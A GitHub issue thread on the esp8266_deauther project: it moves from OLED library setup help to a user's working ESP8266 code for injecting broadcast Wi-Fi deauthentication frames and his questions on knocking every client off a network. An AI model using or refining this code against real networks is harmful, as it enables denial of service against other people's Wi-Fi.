### ISSUE TITLE
Adafruit 1306 issue

### ISSUE THREAD

**Issue by MrJabu** [spacehuhn/esp8266_deauther#955]
What's the trick to get this to work with the Adafuit1306 library?

**Comment by spacehuhn** [comment]
Not sure what you mean, but if you want to know how to setup the OLED read this:
https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons

I used this library:
https://github.com/ThingPulse/esp8266-oled-ssd1306

**Comment by MrJabu** [comment]
> Not sure what you mean, but if you want to know how to setup the OLED read this:
> https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons
> 
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

i am trying to mess around with it and use part of your deauth code but i need to use your module to get it to function. the problem is when i use your module it does not recognize the adafruit library and i am not sure how to change it over to use the one you linked.

**Comment by MrJabu** [comment]
if i include the adafruit library i get an "error compiling for board ..."

**Comment by MrJabu** [comment]
how do i add the adafruit and use your module for the esp8266?

**Comment by spacehuhn** [comment]
lt sounds like your problem is more related to the library working on the ESP8266. If you have problems with the Adafruit library, maybe ask on their GitHub repository?

I use a different library for the screen that has been optimized for the ESP8266. I would recommend you to use the same, it has a very good documentation as well.

If it's something that comes up only with the deauther code, then I need the errors and a detailed description of what you're doing.

**Comment by spacehuhn** [comment]
I used this library:
https://github.com/ThingPulse/esp8266-oled-ssd1306

**Comment by MrJabu** [comment]
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

i think i got it!!! thank you for your help!!

**Comment by MrJabu** [comment]
OK more questions.

1. do you need to send both deauth and disassociation frames or can you just send the deauth?
2. if you want to disconnect everything connected to a certain network, would when you create the packet would you just set 4-9 as 0xFF and 10-15 / 16-21 as the MAC of the network you want to disconnect?
```
    uint8_t deauthPacket[26] = {
      /*  0 - 1  */ 0xC0, 0x00, //type, subtype c0: deauth (a0: disassociate)
      /*  2 - 3  */ 0x00, 0x00, //duration (SDK takes care of that)
      /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,//reciever (target)
      /* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //source (ap)
      /* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //BSSID (ap)
      /* 22 - 23 */ 0x00, 0x00, //fragment & squence number
      /* 24 - 25 */ 0x01, 0x00 //reason code (1 = unspecified reason)
    };
```
i have ran into issues where i disconnect one device for the network but the others are still connected. Does that make sense?

**Comment by MrJabu** [comment]
This is the code i am trying to use. i hard coded channel 1 for testing. 
```
void Deauth(){
  wifi_promiscuous_enable(1); 
  wifi_set_channel(1);    //(WiFi.channel(i));
  deauth[0] = 0xc0; 
  wifi_send_pkt_freedom(deauth, 26, 0);
  wifi_send_pkt_freedom(deauth, 26, 0);
  wifi_send_pkt_freedom(deauth, 26, 0);
  delay(1);
  wifi_promiscuous_enable(0); 
}
```
i have it set to Station Mode earlier on in the setup().
```
  delay(500);
  wifi_set_opmode(STATION_MODE);
  wifi_promiscuous_enable(0);  
  WiFi.disconnect();                                                                //WiFi disconnect
  delay(100); 
```

**Comment by MrJabu** [comment]
```
#include <ESP8266WiFi.h>

extern "C" {
  #include "user_interface.h"
}               
   
uint8_t deauthPacket[26] = {
/* 0 - 1 / 0xC0, 0x00, //type, subtype c0: deauth (a0: disassociate)
/ 2 - 3 / 0x00, 0x00, //duration (SDK takes care of that)
/ 4 - 9 / 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,//reciever (target)
/ 10 - 15 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //source (ap)
/ 16 - 21 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //BSSID (ap)
/ 22 - 23 / 0x00, 0x00, //fragment & squence number
/ 24 - 25 */ 0x01, 0x00 //reason code (1 = unspecified reason)
};

void setup() {
  delay(500);
  wifi_set_opmode(STATION_MODE);
  wifi_promiscuous_enable(1); 
}

void loop() {
    wifi_set_channel(1);
    
    packet[0] = 0xc0;
    
    wifi_send_pkt_freedom(packet, 26, 0);
    wifi_send_pkt_freedom(packet, 26, 0);
    wifi_send_pkt_freedom(packet, 26, 0);
    delay(1);
    wifi_promiscuous_enable(0); 
}
```

This code works when i set
```
/ 10 - 15 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //source (ap)
/ 16 - 21 / 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, //BSSID (ap
```
to the networks MAC i want to disconnect but it doesnt work (only disconnects my phone) when i move it to the format shown in the previous comment.

**Comment by MrJabu** [comment]
Is what i am doing correct?

**Comment by Delfino520** [comment]
> Not sure what you mean, but if you want to know how to setup the OLED read this:
> https://github.com/spacehuhn/esp8266_deauther/wiki/Setup-Display-&-Buttons
> 
> I used this library:
> https://github.com/ThingPulse/esp8266-oled-ssd1306

@spacehuhn Esp8266-WiFi-Bait has been upload to Github, feel free to check it out!

https://github.com/Delfino520/Esp8266-WiFi-Bait﻿

**Comment by tobozo** [comment]
@Delfino520 Your readme looks great and well illustrated, but the content of the repo doesn't look right.

Please expand your zip files so users checking your project can also use the web interface to see the source instead of having to download & deploy locally an unknown binary.

If you need to attach binaries, use the "release" tab and add them here.

**Comment by spacehuhn** [comment]
Since the original question has been answered, I'm closing this now.
